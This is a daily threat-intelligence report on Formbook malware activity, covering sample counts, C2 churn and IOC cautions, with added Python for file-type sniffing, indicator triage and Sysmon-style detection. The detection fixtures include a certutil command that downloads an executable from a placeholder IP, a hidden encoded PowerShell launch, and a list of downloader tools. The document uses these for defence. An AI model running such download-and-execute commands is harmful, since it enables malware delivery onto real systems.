Daily Summary
Formbook activity was effectively stable on 2026-06-07: 29 new samples were detected against a 7-day average of 28, a difference of a single sample. No significant spike or drop was observed, and the file type mix remained consistent with recent patterns.
New Samples Detected
The file type distribution on 2026-06-07 was led by JavaScript samples (11 of 29, 38%), followed by executables (7 of 29, 24%) and VBScript files (5 of 29, 17%). Two .bat files and a single .vbe sample are notable: both are less common delivery formats for Formbook and may indicate a move toward simple script-based first-stage loaders. Bare .bat and .vbe attachments are blocked outright by Outlook and most mail gateways, so if these were mail-delivered they most likely arrived inside archives or via download links rather than as direct attachments. The single .28935 extension is unusual and warrants review: it may be a renamed archive or payload, a custom extension used in a targeted campaign, or simply a naming artifact of the submission pipeline. Its true type should be established from the file header rather than the extension before drawing conclusions.
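Because the .28935 sample's extension says nothing about its content, the practical first step is to type it from its header and compare that with what the extension claims. The Python below is an added example, not part of this report or any vendor tool. The SAMPLES dictionary holds constructed header bytes (not real Formbook samples), and the signature table and keyword hints are a deliberately small set chosen to cover the file types in today's distribution.

```python
"""Identify sample file types from content, not extension.

Added example, not part of the original report or any vendor tooling. The
byte strings in SAMPLES are constructed stand-ins for file headers; they
are not real Formbook samples.
"""

# (offset, magic bytes, label): fixed signatures are checked first.
SIGNATURES = [
    (0, b"MZ", "pe"),                                   # Windows PE (.exe/.dll/.scr)
    (0, b"PK\x03\x04", "zip"),                          # ZIP, also OOXML and JAR
    (0, b"Rar!\x1a\x07", "rar"),
    (0, b"7z\xbc\xaf\x27\x1c", "7z"),
    (0, b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1", "ole2"),  # legacy Office / .msg
    (0, b"%PDF", "pdf"),
    (0, b"#@~^", "vbe_jse"),                            # Script Encoder (.vbe/.jse) header
    (0, b"\x1f\x8b", "gzip"),
]

# Keyword hints for plain-text script loaders, scored per family.
SCRIPT_HINTS = {
    "bat": ("@echo off", "%~dp0", "setlocal", "goto :", "cmd /c"),
    "vbs": ("createobject(", "end sub", "end function", "wscript.echo", "dim "),
    "js":  ("activexobject", "var ", "function(", "eval(", "new "),
}

# What each claimed extension should sniff as.
EXT_TO_TYPE = {
    "exe": "pe", "dll": "pe", "scr": "pe", "js": "js", "vbs": "vbs",
    "vbe": "vbe_jse", "jse": "vbe_jse", "bat": "bat", "cmd": "bat",
    "zip": "zip", "rar": "rar", "7z": "7z", "pdf": "pdf", "doc": "ole2", "xls": "ole2",
}

# Constructed headers, not real samples.
SAMPLES = {
    "invoice.exe": b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff",
    "order.js": b'var sh = new ActiveXObject("WScript.Shell");\r\nsh.Run("notepad.exe");',
    "quote.vbs": b'Dim sh\r\nSet sh = CreateObject("WScript.Shell")\r\nWScript.Echo "ok"\r\n',
    "run.bat": b"@echo off\r\nsetlocal\r\nstart /b %~dp0payload.exe\r\n",
    "doc.vbe": b"#@~^AAAAAA==\x01...",
    "sample.28935": b"PK\x03\x04\x14\x00\x00\x00\x08\x00",   # archive under an odd extension
    "report.pdf": b"MZ\x90\x00",                              # PE masquerading as PDF
}


def sniff(data: bytes) -> str:
    """Return a type label for the leading bytes of a file."""
    for offset, magic, label in SIGNATURES:
        if data[offset:offset + len(magic)] == magic:
            return label
    head = data[:512]
    if head.startswith((b"\xff\xfe", b"\xfe\xff")):      # UTF-16 text with BOM
        head = head.decode("utf-16", errors="ignore").encode("ascii", errors="ignore")
    printable = sum(1 for b in head if 32 <= b < 127 or b in (9, 10, 13))
    if not head or printable / len(head) < 0.9:          # mostly binary, no known signature
        return "unknown"
    low = head.decode("ascii", errors="ignore").lower()
    scores = {fam: sum(1 for k in hints if k in low) for fam, hints in SCRIPT_HINTS.items()}
    best = max(scores, key=scores.get)
    return best if scores[best] > 0 else "text"


def classify(name: str, data: bytes) -> dict:
    """Pair the claimed extension with the sniffed type and flag disagreements."""
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    expected = EXT_TO_TYPE.get(ext)
    sniffed = sniff(data)
    return {"name": name, "ext": ext, "sniffed": sniffed,
            "mismatch": expected is not None and expected != sniffed,
            "unknown_ext": expected is None}


def flagged(samples: dict) -> set:
    """Names whose extension is unknown or disagrees with the header."""
    return {r["name"] for r in (classify(n, d) for n, d in samples.items())
            if r["mismatch"] or r["unknown_ext"]}


if __name__ == "__main__":
    for name, data in SAMPLES.items():
        print(classify(name, data))
```

In today's batch this puts the .28935 file and any extension/header disagreement at the top of the review queue; the keyword scoring is a heuristic and should be backed by sandbox execution for anything it labels as script.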
C2 Infrastructure
A total of 100 new C2 servers were identified today, a significant uptick in infrastructure churn. Registration at this rate suggests the operators are actively rotating or expanding command-and-control infrastructure, likely to evade blocklists and maintain operational resilience. Analysts should block these IPs and domains in bulk, but with two checks first: normalize and deduplicate the entries, and screen them against known-good domains, because Formbook configurations mix decoy domains in with the real C2 and blocking a decoy that happens to be a legitimate site causes an outage rather than protection. Clustering the remainder by registrable domain and by /24 netblock will surface shared hosting providers or registrar abuse worth tracking.
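Before pushing a day's worth of network indicators to a blocklist, the list should be normalized, deduplicated, screened against known-good domains (to catch Formbook decoys) and clustered to expose shared hosting. The Python below is an added example, not the report's own tooling. SAMPLE_C2 and ALLOWLIST are constructed from RFC 5737 documentation ranges and example domains, and registrable() uses a naive last-two-labels rule where production code would consult the Public Suffix List.

```python
"""Triage a daily batch of Formbook C2 indicators before bulk blocking.

Added example, not part of the original report. SAMPLE_C2 and ALLOWLIST are
constructed using reserved documentation ranges (RFC 5737) and example
domains; they are not real Formbook indicators.
"""
import ipaddress
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed batch in the mixed shapes a feed typically emits.
SAMPLE_C2 = [
    "http://203.0.113.10/fb/panel.php",
    "203.0.113.10",                    # same host as above, bare
    "203.0.113.44:8080",               # host:port
    "198.51.100.7",
    "www.panel-one.example.net/fb/",   # host plus path, no scheme
    "cdn.panel-one.example.net",
    "static.example.org",              # registrable domain on the allowlist
    "login.example.com.",              # trailing dot (FQDN form)
]
ALLOWLIST = ["example.org"]            # constructed known-good list


def normalize(ioc: str) -> tuple[str, str]:
    """Reduce a URL / host:port / bare host to ('ip'|'domain', hostname)."""
    s = ioc.strip().lower()
    if "://" in s:
        s = urlsplit(s).hostname or ""
    else:
        s = s.split("/", 1)[0]
        if s.count(":") == 1:          # strip :port (IPv6 literals not expected here)
            s = s.split(":", 1)[0]
    s = s.rstrip(".")
    try:
        ipaddress.ip_address(s)
        return "ip", s
    except ValueError:
        return "domain", s


def registrable(domain: str) -> str:
    """Naive registrable domain: last two labels. Production code should use
    the Public Suffix List so that e.g. foo.co.uk is handled correctly."""
    parts = domain.split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else domain


def triage(iocs, allowlist):
    """Split indicators into block / review, and cluster them for pattern hunting."""
    allow = {d.strip().lower() for d in allowlist}
    seen, block, review = set(), [], []
    groups = defaultdict(list)          # registrable domain or /24 -> members
    for raw in iocs:
        kind, value = normalize(raw)
        if not value or value in seen:
            continue
        seen.add(value)
        if kind == "domain":
            reg = registrable(value)
            if reg in allow:
                # Formbook configs embed decoy domains next to the real C2;
                # an allowlisted hit is more likely a decoy than a compromise.
                review.append((value, "registrable domain is allowlisted; likely decoy"))
                continue
            groups[reg].append(value)
        else:
            ip = ipaddress.ip_address(value)
            prefix = 24 if ip.version == 4 else 48
            groups[str(ipaddress.ip_network(f"{value}/{prefix}", strict=False))].append(value)
        block.append(value)
    clusters = {k: v for k, v in groups.items() if len(v) > 1}
    return {"block": block, "review": review, "clusters": clusters}


if __name__ == "__main__":
    result = triage(SAMPLE_C2, ALLOWLIST)
    print(f"block {len(result['block'])}, review {len(result['review'])}, "
          f"clusters {list(result['clusters'])}")
```

The "review" bucket is where the decoy problem shows up: an allowlisted registrable domain in a Formbook config is almost always a decoy, and the entries in "clusters" (several hosts on one netblock or under one registrable domain) are the shared-hosting and registrar-abuse patterns the section recommends watching.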
IOC Highlights
129 new IOCs were generated from today's samples, consistent with the 100 C2 entries plus one hash per sample. The high ratio of C2 entries to samples (100 for 29) should not be read as 100 distinct live servers: Formbook configurations embed lists of decoy domains alongside the real C2, so extracted network indicators inflate the apparent footprint, and the live endpoint for each sample should be confirmed through sandbox traffic or config parsing before sinkholing effort is spent. Immediate attention should still be given to the lone .28935 file and its associated network artifacts.
Security Analysis
The appearance of two .bat files alongside a .vbe sample suggests a possible shift toward loaders run by built-in interpreters (cmd.exe for .bat, wscript.exe or cscript.exe for .vbe) rather than standalone executables, which tend to draw closer scrutiny. Today's data do not support attributing the activity to a specific actor, and no attribution is made here. Defenders should restrict scripting engines where they are not needed (for example, disabling Windows Script Host by setting the Enabled value to 0 under HKLM\SOFTWARE\Microsoft\Windows Script Host\Settings, or applying AppLocker/WDAC script rules) and constrain PowerShell, and should monitor for outbound HTTP/HTTPS connections from wscript.exe or cscript.exe as a key detection signal. For .bat-driven chains, cmd.exe or a script host spawning download utilities such as certutil.exe, bitsadmin.exe or powershell.exe is a complementary signal.
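The detection signal above (script hosts making outbound web connections) can be expressed directly against Sysmon-style telemetry. The Python below is an added example, not the report's own detection content. SAMPLE_LOG is constructed JSON-lines in the shape of Sysmon Event ID 3 (network connection) and Event ID 1 (process creation) records using RFC 5737 addresses, and the second rule, which flags downloader utilities spawned by cmd.exe or a script host, extends beyond the single signal the section names.

```python
"""Flag script-host loader behaviour in Sysmon-style telemetry.

Added example, not part of the original report. SAMPLE_LOG is constructed
JSON-lines shaped like Sysmon Event ID 3 (network connection) and Event ID 1
(process creation) records; hosts use RFC 5737 documentation addresses.
"""
import json
from collections import Counter

SAMPLE_LOG = r"""
{"EventID": 3, "Image": "C:\\Windows\\System32\\wscript.exe", "DestinationIp": "203.0.113.10", "DestinationPort": 80, "Initiated": "true"}
{"EventID": 3, "Image": "C:\\Program Files\\Mozilla Firefox\\firefox.exe", "DestinationIp": "198.51.100.7", "DestinationPort": 443, "Initiated": "true"}
{"EventID": 3, "Image": "C:\\Windows\\System32\\cscript.exe", "DestinationIp": "203.0.113.10", "DestinationPort": 443, "Initiated": "false"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\certutil.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "certutil -urlcache -split -f http://203.0.113.10/x.exe x.exe"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\notepad.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "notepad.exe"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\System32\\wscript.exe", "CommandLine": "powershell -nop -w hidden -enc ..."}
"""

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe"}
SHELL_PARENTS = {"cmd.exe", "wscript.exe", "cscript.exe"}
DOWNLOADERS = {"powershell.exe", "certutil.exe", "bitsadmin.exe", "curl.exe", "mshta.exe"}
WEB_PORTS = {80, 443, 8080, 8443}


def basename(path: str) -> str:
    """Lower-cased final path component, tolerant of either separator."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def load_events(text: str) -> list:
    """Parse JSON-lines telemetry, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def detect(events: list) -> list:
    alerts = []
    for idx, ev in enumerate(events):
        image = basename(ev.get("Image", ""))
        if ev.get("EventID") == 3:
            # Rule 1 (the signal named in the report): a script host itself
            # initiating an outbound HTTP/HTTPS connection. "Initiated" is
            # checked so that inbound connections to a listening process
            # do not fire.
            initiated = str(ev.get("Initiated", "")).lower() == "true"
            if initiated and image in SCRIPT_HOSTS and int(ev.get("DestinationPort", 0)) in WEB_PORTS:
                alerts.append({"rule": "script_host_outbound_web", "index": idx, "image": image,
                               "dest": f"{ev.get('DestinationIp')}:{ev.get('DestinationPort')}"})
        elif ev.get("EventID") == 1:
            # Rule 2 (extension beyond the report): a .bat/.vbe loader that does
            # not fetch the payload itself usually hands off to a built-in
            # downloader, so flag those children of cmd.exe or a script host.
            parent = basename(ev.get("ParentImage", ""))
            if parent in SHELL_PARENTS and image in DOWNLOADERS:
                alerts.append({"rule": "script_parent_spawns_downloader", "index": idx,
                               "parent": parent, "image": image,
                               "cmdline": ev.get("CommandLine", "")})
    return alerts


def summarize(alerts: list) -> dict:
    """Alert counts per rule, for a quick daily roll-up."""
    return dict(Counter(a["rule"] for a in alerts))


if __name__ == "__main__":
    for alert in detect(load_events(SAMPLE_LOG)):
        print(alert)
```

Against the constructed log this fires on the wscript.exe outbound connection and on the two downloader hand-offs, and stays quiet on the browser connection, the benign notepad launch and the cscript.exe record whose connection was not initiated by the process. In a real environment, tune the rule with an exclusion list for administrative scripts that legitimately call out, rather than by widening the port set.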